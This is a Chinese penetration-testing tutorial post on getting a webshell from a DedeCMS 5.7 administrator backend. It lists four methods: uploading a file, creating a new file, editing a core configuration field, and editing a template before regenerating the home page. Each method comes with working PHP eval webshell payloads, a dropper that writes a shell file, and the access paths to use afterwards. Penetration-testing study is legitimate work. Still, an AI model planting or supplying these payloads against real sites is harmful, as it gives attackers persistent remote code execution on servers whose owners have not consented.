120.网络安全渗透测试—[CMS后台 getwebshell]—[织梦dedecms5.7后台 getwebshell]

我认为，无论是学习安全还是从事安全的人，多多少少都有些许的情怀和使命感！！！

文章目录

• • 一、织梦dedecms5.7后台 getwebshell
  • • 1、方法1：上传文件
    • 2、方法2：新建文件
    • 3、方法3：编辑核心配置文件
    • 4、方法4：编辑模板-->更新页面

一、织梦dedecms5.7后台 getwebshell

1、方法1：上传文件

（1）进入后台：模块---->文件管理器---->上传文件---->shell.php，内容为<?php phpinfo();eval($_POST[123]);?>
（2）访问：\shell.php

2、方法2：新建文件

（1）进入后台：模块---->文件管理器---->新建文件---->写入wshell.php，内容为<?php fputs(fopen('shell0.php','w'),'<?php phpinfo();eval(\$_POST[123]);?>');?>
（2）访问：\wshell.php
（3）访问：\shell0.php

3、方法3：编辑核心配置文件

（1）进入后台：系统---->系统基本参数---->核心配置---->专题最大的节点数或FTP端口写入${eval($_POST[123])}
（2）访问：data\config.cache.inc.php

4、方法4：编辑模板–>更新页面

（1）进入后台：模板---->默认模板管理---->index.html的末尾加上<?php phpinfo();eval($_POST[123]);?>
（2）生成---->更新主页HTML---->主页模板默认选择default\index.html---->主页位置填入…\shell00.php–>勾选生成静态---->点击更新主页HTML
（3）访问：\shell00.php